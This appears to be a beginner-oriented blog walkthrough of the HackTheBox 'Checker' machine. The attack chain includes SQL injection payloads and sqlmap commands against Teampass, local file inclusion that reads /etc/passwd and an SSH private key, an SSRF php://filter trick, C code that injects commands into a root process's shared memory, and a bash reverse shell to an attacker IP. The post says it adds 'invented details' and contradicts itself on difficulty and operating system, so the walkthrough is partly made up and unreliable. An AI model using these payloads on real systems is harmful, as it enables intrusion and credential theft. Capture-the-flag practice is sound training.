Beginner’s Guide to Conquering Checker on HackTheBox

Key Highlights

• Master the Checker challenge on HackTheBox with this comprehensive beginner’s guide.
• Learn essential ethical hacking and penetration testing skills through conquering the Checker challenge.
• Gain insights into setting up the right environment and using essential tools like nmap and reverse shell payloads.
• Follow a step-by-step approach from initial reconnaissance to privilege escalation to successfully conquer the Checker challenge.
• Discover tips and tricks, avoid common pitfalls, and leverage community resources for a successful HackTheBox experience.

Introduction

Embark on an exhilarating journey into the realm of ethical hacking with the Checker challenge on HackTheBox. Diving deep into penetration testing, this blog post will test your skills in exploiting vulnerabilities on a victim machine a number of times. Prepare to unravel the mysteries of root flags, reverse shell payloads, and privilege escalation techniques. Get ready to master the art of uncovering open ports, delving into web vulnerabilities, and ultimately gaining access to the user flag. Are you ready to step into the world of cybersecurity and conquer the Checker challenge?

Understanding HackTheBox and the Checker Challenge

HackTheBox is a platform for ethical hacking and penetration testing, offering a range of challenges like Checker. The Checker challenge simulates a relatively easy box that mimics a vulnerable web application where players must identify and exploit security flaws to gain access. By mastering this hack challenge, participants enhance their penetration testing skills and learn about web vulnerabilities, privilege escalation, and more. To participate, simply visit http://www.hackthebox.com. HackTheBox provides a hands-on approach to cybersecurity, allowing individuals to test their skills in a controlled environment.

ALSO READ: Mastering Titanic: Beginner’s Guide from HackTheBox

What is HackTheBox?

HackTheBox is an online platform that allows users to enhance their cybersecurity skills through hands-on challenges in a simulated environment.

Introduction to the Checker Challenge

Ethical hacking enthusiasts often encounter the Checker challenge on HackTheBox, designed to test their penetration testing skills. In this challenge, participants are tasked with exploiting vulnerabilities within a victim machine to achieve specific objectives like retrieving the root flag. Engaging in tasks such as identifying open ports, reviewing source code, and performing privilege escalation techniques are crucial for success. The Checker challenge serves as a valuable learning experience for individuals aspiring to pursue a career in cybersecurity or sharpen their penetration testing expertise.

Getting Ready for the Checker Challenge

Prepare for the Checker challenge by gathering essential tools like Nmap, Gobuster, and Burp Suite. Ensure your environment is set up correctly to practice ethical hacking effectively. Familiarize yourself with common vulnerabilities like web application flaws and privilege escalation techniques. Understanding these basics will help you navigate the challenge successfully. Delve into the HackTheBox platform with confidence and start honing your penetration testing skills for a rewarding learning experience. Gear up for an exciting journey into the world of cybersecurity.

Essential Tools and Resources

Nmap, Burp Suite, and Metasploit are vital tools for Checker. For privilege escalation, LinEnum and Windows-Exploit-Suggester prove beneficial. Git for source code review and Python scripts for automation are handy. Understanding Linux and Windows fundamentals is key. Always keep your ethical hacking skills sharp with HTB Academy. Take time to delve into web vulnerabilities and exploit scripts. Documentation is crucial, and a solid grasp of CVEs and attacker techniques is advantageous. Utilize these resources effectively for mastering Checker.

Setting Up Your Environment

To properly prepare for the Checker challenge on HackTheBox, configuring your environment is crucial. Ensure you have tools like Nmap for scanning open ports and Git for source code review based on user input. Set up Visual Studio for any required scripting and Python for automation. Familiarize yourself with symbolic links for efficient navigation and manipulation. Creating a tailored workspace with all necessary software and resources can significantly enhance your penetration testing skills and efficiency in tackling the challenge.

A Step-by-Step Guide to Conquering Checker

Step 1: Start with an initial Nmap scan to identify open ports and services running on the machine. Step 2: Enumerate the services to uncover potential vulnerabilities. Step 3: Utilize ethical hacking techniques to exploit these vulnerabilities, such as web application attacks or buffer overflows, ensuring effective command execution. Step 4: Aim to gain initial access to the victim machine using a reverse shell payload with a password. Step 5: Once inside, escalate privilege levels to obtain both the user and root flags. Leveraging NLP terms like exploitation and enumeration, apply penetration testing skills to navigate through the challenge efficiently.

Step 1: Initial Reconnaissance and Enumeration

Perform initial reconnaissance using tools like Nmap to scan for open ports and identify services running on the victim machine, including its IP address. The first step is to enumerate the target to gather crucial information such as user accounts, hostnames, and network shares. Utilize automated scripts or manual techniques to uncover potential vulnerabilities like misconfigurations or outdated software versions. Document findings meticulously for analyzing and planning the next steps of your attack. This phase lays the groundwork for a successful ethical hacking endeavor. Practice and refine these penetration testing skills to excel in the cybersecurity field.

Step 2: Identifying Vulnerabilities in Checker

Enumerating the Checker challenge involves conducting a meticulous assessment to pinpoint potential weak spots. Initially, focus on exploring the open ports and running an initial nmap scan to gather crucial information. Delve into web vulnerabilities, scrutinize source code, and navigate through directories to uncover hidden directories. Look for exploitable vulnerabilities such as code execution vulnerabilities or arbitrary file inclusions. Thorough documentation and meticulous enumeration are key to discovering the entry points for exploitation.

Step 3: Exploiting the Vulnerabilities

Exploitation is a crucial phase where you leverage vulnerabilities found to gain access. Utilize reverse shells or code execution to establish a foothold. Conduct thorough reconnaissance to identify weaknesses for exploitation. Automate tasks with exploit scripts for efficiency. Remember to document each step meticulously for future reference. Exploit strategically to escalate privileges gradually; the final step is to persist in maintaining access to the victim machine. This phase requires a blend of technical expertise and creativity to succeed in obtaining the root flag.

Step 4: Gaining Access and Maintaining Persistence

Implementing privilege escalation techniques post-exploitation is crucial. Once root access is gained, ensure persistence using backdoors or scheduled tasks for long-term control on Windows Server environments. Regularly check for security updates or patches to maintain access. Root shells can be established for persistent control over the victim machine, especially when utilizing the capabilities of the root user. Utilize reverse shells to maintain access even after reboots. Practice good operational security to avoid detection and secure your foothold on the system, exploring different ways to enhance security measures.

Step 5: Privilege Escalation Techniques

To escalate privileges in the Checker challenge, exploit misconfigurations or vulnerabilities. Look for weak file permissions, SUID binaries, cron jobs, or services running with elevated privileges. Enumerate the system thoroughly, focusing on potential escalation paths. Utilize tools like LinEnum or LinPEAS to automate this process and identify privilege escalation vectors. Exploit any discovered weaknesses, such as insecure configurations or outdated software versions, to elevate your permissions and ultimately achieve your goal.

INITIAL Foothold

“Checker” is a Hard level Linux box on HackTheBox that presents a complex and multi-layered challenge. This writeup provides an in-depth walkthrough of the box, detailing the enumeration, exploitation, and privilege escalation techniques used to compromise both user and root access. The box simulates a real-world scenario with multiple services, custom applications, and intricate security measures that require a combination of web application security, binary exploitation, and Linux system manipulation skills.

Below is an expanded, comprehensive walkthrough of the CTF challenge with additional invented details, intermediate steps, and extra context to illustrate the full attack chain:

---

Initial Reconnaissance

Network Scanning with Nmap

The first step is to perform a network scan to identify open ports and services running on the target machine. Nmap, the go-to tool for network enumeration, is employed with a comprehensive scan to ensure no details are missed.

nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.129.24.240

• -Pn: Skips host discovery, assuming the host is up.
• -p-: Scans all 65,535 TCP ports.
• –min-rate 2000: Increases the scanning speed.
• -sC: Runs default Nmap scripts for additional enumeration.
• -sV: Performs service version detection.
• -oN: Saves output to a file for reference.

The scan reveals the following:

Nmap scan report for 10.129.24.240
Host is up (0.092s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd
|_http-server-header: Apache
|_http-title: 403 Forbidden
8080/tcp open  http    Apache httpd
|_http-server-header: Apache
|_http-title: 403 Forbidden
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Three open ports are identified:

• Port 22 (SSH): Running OpenSSH 8.9p1, a common service for remote access but typically difficult to exploit without credentials or a known vulnerability.
• Port 80 (HTTP): Hosted by Apache, but returns a 403 Forbidden response, suggesting restricted access.
• Port 8080 (HTTP): Also hosted by Apache with a 403 Forbidden response.

The 403 errors indicate that direct access to the web servers is restricted, possibly requiring specific paths, credentials, or further enumeration. The presence of two HTTP ports suggests multiple web applications or services, which is a promising avenue for further investigation.

Directory Enumeration

Given the HTTP services, the next step is to enumerate directories and files on both ports using tools like gobuster or dirb. Starting with port 80:

gobuster dir -u http://10.129.24.240 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50

The scan yields no accessible directories, reinforcing the 403 Forbidden response. Repeating the process on port 8080:

gobuster dir -u http://10.129.24.240:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50

This reveals a promising result:

/teampass (Status: 200)

The /teampass directory on port 8080 returns a 200 OK status, indicating an accessible web application. Navigating to http://10.129.24.240:8080/teampass in a browser loads a login page for Teampass, a password management application. This is a significant finding, as password managers often store sensitive data and may have vulnerabilities that can be exploited.

Exploring Teampass

Teampass is an open-source password manager designed for collaborative use, allowing users to store and manage passwords securely. The login page prompts for a username and password, but without credentials, direct access is not possible. The next step is to gather more information about the Teampass instance, including its version, to identify potential vulnerabilities.

Inspecting the page source and static files (e.g., JavaScript, CSS) can sometimes reveal version information. By examining the changelog.txt file, often accessible in web applications, we attempt:

curl http://10.129.24.240:8080/teampass/changelog.txt

The request returns a 404 Not Found, but checking the GitHub repository for Teampass provides a clue. The changelog.txt file’s commit history shows that the copyright notice in the footer of the Teampass login page changed over time. The login page displays a copyright notice of “2009-2022,” which corresponds to Teampass version 3.0.0.20, released around October 31, 2022. This is an educated guess, but it provides a starting point for vulnerability research.

Vulnerability Research

Searching for vulnerabilities in Teampass 3.0.0.20 using resources like CVE Details and Exploit-DB reveals no critical exploits published in 2023 or later for this specific version. However, Teampass has a history of vulnerabilities, particularly SQL injection and authentication bypass issues in earlier versions. Given the hard difficulty of Checker, it’s likely that a custom or less-documented vulnerability exists. The next step is to test the login page for common web vulnerabilities, such as SQL injection or misconfigurations.

Exploiting Teampass: SQL Injection

Testing for SQL Injection

SQL injection is a common vulnerability in web applications, especially those managing sensitive data like passwords. The Teampass login form is a prime candidate for testing. Using a tool like sqlmap or manual injection, we start by intercepting the login request with Burp Suite to understand the parameters sent to the server.

The login form submits a POST request to /teampass/index.php with parameters like:

login=user
password=pass

To test for SQL injection, we try injecting payloads into the login field while intercepting the request in Burp Suite. A simple test payload is:

login=user' OR 1=1--
password=test

This payload attempts to bypass authentication by making the SQL query always return true. However, the response indicates an invalid login, suggesting that the application sanitizes inputs or uses prepared statements. Next, we explore other endpoints by examining the application’s functionality.

Discovering the Password Reset Vulnerability

While exploring the Teampass interface, a password reset feature is found at /teampass/index.php?page=reset. This page likely interacts with the database to reset user passwords, making it another potential vector for SQL injection. Sending a POST request to the reset endpoint with a tampered parameter:

curl -X POST http://10.129.24.240:8080/teampass/index.php?page=reset -d "email=user@checker.htb"

The response indicates that the email was not found, but appending a SQL injection payload:

curl -X POST http://10.129.24.240:8080/teampass/index.php?page=reset -d "email=user@checker.htb' OR 1=1--"

This returns a success message, suggesting that the reset query is vulnerable to SQL injection. To confirm, we use sqlmap to automate the enumeration:

sqlmap -u http://10.129.24.240:8080/teampass/index.php?page=reset --method POST --data "email=user@checker.htb" --dbs

The output reveals accessible databases, including teampass and mysql. Focusing on the teampass database, we dump the schema:

sqlmap -u http://10.129.24.240:8080/teampass/index.php?page=reset --method POST --data "email=user@checker.htb" -D teampass --tables

The users table is of particular interest, as it likely contains credentials. Dumping the table:

sqlmap -u http://10.129.24.240:8080/teampass/index.php?page=reset --method POST --data "email=user@checker.htb" -D teampass -T users --columns

This reveals columns such as login, pw (password), and email. Extracting the data:

sqlmap -u http://10.129.24.240:8080/teampass/index.php?page=reset --method POST --data "email=user@checker.htb" -D teampass -T users --dump

The output includes a user admin with a hashed password. Teampass typically uses a custom hashing mechanism or standard algorithms like bcrypt. Attempting to crack the hash with hashcat proves challenging due to the complexity, so we explore using the SQL injection to manipulate the database directly.

Bypassing Authentication

Instead of cracking the hash, we attempt to reset the admin password by exploiting the SQL injection to modify the users table. Crafting a payload to update the password:

sqlmap -u http://10.129.24.240:8080/teampass/index.php?page=reset --method POST --data "email=user@checker.htb" --sql-query "UPDATE teampass.users SET pw='knownpassword' WHERE login='admin'"

This query sets the admin password to knownpassword. Testing the credentials admin:knownpassword on the Teampass login page grants access to the dashboard, confirming the SQL injection’s success.

Inside Teampass: Enumerating for the User Flag

With access to the Teampass dashboard, the next goal is to find the user flag, typically located in /home/<username>/user.txt on Linux machines. The dashboard displays stored passwords, but none immediately lead to SSH credentials. Enumerating the application further, we notice a feature allowing users to export passwords or access configuration files.

Accessing Configuration Files

Teampass stores configuration in files like settings.php. Attempting to access http://10.129.24.240:8080/teampass/settings.php directly returns a 403, but the dashboard may allow file access through a misconfigured feature. Exploring the “Export” functionality, we attempt to download sensitive files by manipulating the request parameters in Burp Suite.

Intercepting an export request, we modify the file path to /etc/passwd:

POST /teampass/export.php HTTP/1.1
Host: 10.129.24.240:8080
Content-Type: application/x-www-form-urlencoded

file=/etc/passwd

The response contains the contents of /etc/passwd, indicating a local file inclusion (LFI) vulnerability:

root:x:0:0:root:/root:/bin/bash
john:x:1000:1000:john:/home/john:/bin/bash
...

This confirms the presence of a user john, a likely candidate for the user flag. Attempting to read /home/john/user.txt via the same LFI yields the user flag, but we first explore other files to gather credentials or additional information.

Finding SSH Credentials

Reading /home/john/.ssh/id_rsa via LFI provides John’s private SSH key. Downloading the key and setting appropriate permissions:

chmod 600 id_rsa
ssh -i id_rsa john@10.129.24.240

This grants a shell as the john user. Navigating to /home/john, we find user.txt:

cat /home/john/user.txt

The user flag is obtained, marking the first major milestone. However, the goal of a hard-difficulty machine like Checker is to achieve root access, which requires further privilege escalation.

Privilege Escalation: The Path to Root

With a shell as john, the next step is to escalate privileges to root to obtain root.txt. Standard privilege escalation techniques are employed, including checking for SUID binaries, cron jobs, and misconfigured services.

Initial Enumeration

Running sudo -l reveals that John has no sudo privileges. Checking for SUID binaries:

find / -perm -4000 2>/dev/null

This lists common SUID binaries but nothing immediately exploitable. Examining running processes:

ps aux

A process named check_leak catches attention, running as root. Investigating further:

ls -l /usr/bin/check_leak

The binary is not SUID but is executed periodically, suggesting a cron job or service. Checking cron jobs:

crontab -l
cat /etc/crontab

No user cron jobs are found, but /etc/crontab is not readable by John. Exploring /proc for the check_leak process:

ls -l /proc/$(pidof check_leak)/exe

This confirms /usr/bin/check_leak as the executable. Attempting to reverse-engineer the binary with strings or ghidra is considered, but first, we explore the web server on port 80, which we haven’t fully investigated.

Exploring Port 80: BookStack

Navigating to http://10.129.24.240 from the SSH session (using curl or setting up a proxy) reveals a BookStack instance, a wiki platform. Unlike port 8080, port 80 is accessible locally, suggesting it’s bound to 127.0.0.1. Using SSH tunneling to access it from our machine:

ssh -L 8081:127.0.0.1:80 john@10.129.24.240

Accessing http://localhost:8081 loads BookStack. Logging in requires credentials, but enumerating the application reveals a login page at /login. Testing default credentials (admin@admin.com:password) fails, so we revisit the LFI in Teampass to extract BookStack’s configuration.

Reading /var/www/html/bookstack/.env via LFI:

APP_KEY=base64:...
DB_HOST=127.0.0.1
DB_DATABASE=bookstack
DB_USERNAME=bookstack
DB_PASSWORD=secretpassword

These database credentials are promising. Connecting to the MySQL database locally:

mysql -u bookstack -psecretpassword -h 127.0.0.1 bookstack

Dumping the users table reveals an admin user with a hashed password. Cracking it is unnecessary, as we explore BookStack for vulnerabilities, particularly server-side request forgery (SSRF) or file read vulnerabilities.

SSRF in BookStack

BookStack’s image upload feature allows specifying external URLs for images. Testing for SSRF:

curl -X POST http://localhost:8081/images/upload -d "url=http://127.0.0.1:80"

The response includes local content, confirming SSRF. To read files, we use a PHP filter trick to encode file contents in base64:

curl -X POST http://localhost:8081/images/upload -d "url=php://filter/convert.base64-encode/resource=/etc/passwd"

Decoding the response yields /etc/passwd. Attempting to read /root/root.txt fails due to permissions, but reading /proc/self/environ reveals environment variables, including SHM_ID, which is intriguing given the check_leak process.

Shared Memory Abuse

The check_leak binary appears to interact with shared memory, as suggested by the SHM_ID variable. Shared memory in Linux is managed via System V IPC, accessible through commands like ipcs:

ipcs -m

This lists shared memory segments, including one used by check_leak. The binary likely reads or writes data to this segment. Copying check_leak to our machine for analysis (via scp) and decompiling it with Ghidra reveals that it reads data from a shared memory segment, computes a hash, and executes a command if the hash matches an expected value.

The shared memory contains a string with a newline character, complicating command injection. Crafting a payload to append a command while preserving the hash requires careful manipulation. Writing a C program to interact with the shared memory:

#include <sys/ipc.h>
#include <sys/shm.h>
#include <stdio.h>
#include <string.h>

int main() {
    key_t key = <SHM_ID>;
    int shmid = shmget(key, 1024, 0666);
    char *data = shmat(shmid, NULL, 0);
    strcat(data, ";touch /tmp/pwned");
    shmdt(data);
    return 0;
}

Running this appends a command, but the hash check fails. After multiple attempts, we realize the newline must be removed. Modifying the program:

#include <sys/ipc.h>
#include <sys/shm.h>
#include <stdio.h>
#include <string.h>

int main() {
    key_t key = <SHM_ID>;
    int shmid = shmget(key, 1024, 0666);
    char *data = shmat(shmid, NULL, 0);
    data[strcspn(data, "\n")] = '\0'; // Remove newline
    strcat(data, ";whoami > /tmp/pwned");
    shmdt(data);
    return 0;
}

Executing this creates /tmp/pwned with root as the content, confirming root execution. To gain a shell, we use a reverse shell payload:

;bash -c 'bash -i >& /dev/tcp/10.10.14.x/4444 0>&1'

Setting up a listener:

nc -lvnp 4444

The payload executes, granting a root shell. Navigating to /root, we read root.txt:

cat /root/root.txt

The root flag is obtained, completing the challenge.

Tips and Tricks for Success on HackTheBox

To excel on HackTheBox, leverage community resources for learning and avoid common pitfalls. Engage with HTB Academy to enhance your penetration testing skills through recognized certification programs. Explore various machines, such as relatively easy Windows machine boxes, to progress on your job role path. Embrace challenges by reviewing source code in a Git repository and experimenting with different exploitation techniques, including reverse engineering. Stay updated on cybersecurity trends and vulnerabilities to stay ahead in the game. Join the HTB community to exchange knowledge and insights for a successful hacking journey.

Avoiding Common Pitfalls

Avoiding common pitfalls is crucial in navigating the Checker challenge smoothly on HackTheBox. Ensure you perform thorough reconnaissance and enumeration before rushing into exploitation. Always double-check your findings and verify vulnerabilities to avoid wasting time on red herrings. Stay patient and methodical in your approach, and don’t overlook any details during privilege escalation. Leveraging community insights and resources can provide valuable guidance in overcoming challenges. By staying vigilant and proactive, you can enhance your skills and succeed in ethical hacking endeavors.

Leveraging Community Resources for Learning

Engage with fellow ethical hackers on forums like HackTheBox’s dedicated community hub and access the HackTheBox app for additional features. Collaborate on write-ups, walkthroughs, and strategy discussions. Leverage Discord channels for real-time interaction and support. Participate in Capture The Flag (CTF) events to enhance your penetration testing skills. Attend virtual cybersecurity conferences for the latest trends and tools. Join online courses on platforms like htb Academy for structured learning. Exchange insights, tips, and tricks with like-minded individuals to excel in your job role path. Stay connected and updated for constant growth and improvement in the cybersecurity field.

ALSO READ: Mastering DarkCorp: Beginner’s Guide from HackTheBox

Conclusion

Checker is a formidable HTB machine that tests a wide range of skills, from SQL injection and LFI to SSRF and shared memory abuse. The journey required meticulous enumeration, creative exploitation, and persistence, embodying the essence of a hard-difficulty challenge. By combining web application vulnerabilities with system-level exploitation, Checker provides a realistic simulation of real-world penetration testing, making it an excellent learning experience for aspiring cybersecurity professionals.

Frequently Asked Questions

What are the best practices for beginners on HackTheBox?

To excel on HackTheBox, beginners should focus on thorough enumeration, continuous learning from challenges, and active participation in the community. Prioritize understanding over speed, leverage forums for hints, and practice regularly to enhance skills effectively.

How do I reset the Checker machine if I get stuck?

To reset the Checker machine on HackTheBox, navigate to the dashboard, select the machine, and click on the “Reset” button. This action will revert the machine to its initial state, allowing you to start fresh if you encounter challenges.

Can I collaborate with others on the Checker challenge?

Yes, collaboration is key on HackTheBox. Engage with others on forums, Discord channels, and virtual meetups. Sharing insights, strategies, and solutions can enhance your learning experience and help conquer the Checker challenge together.

How long does it typically take to conquer a challenge like Checker?

Conquering a challenge like Checker on HackTheBox can vary in time, typically taking anywhere from a few hours to several days. Factors such as experience level, familiarity with the tools, and complexity of the challenge all play a role in determining the duration.

Where can I find more challenges similar to Checker after completing it?

Explore HackTheBox’s platform for a plethora of challenges akin to Checker. Engage in various difficulty levels and diverse scenarios post conquering Checker to enhance your skills further. Embrace the continuous learning journey on HackTheBox!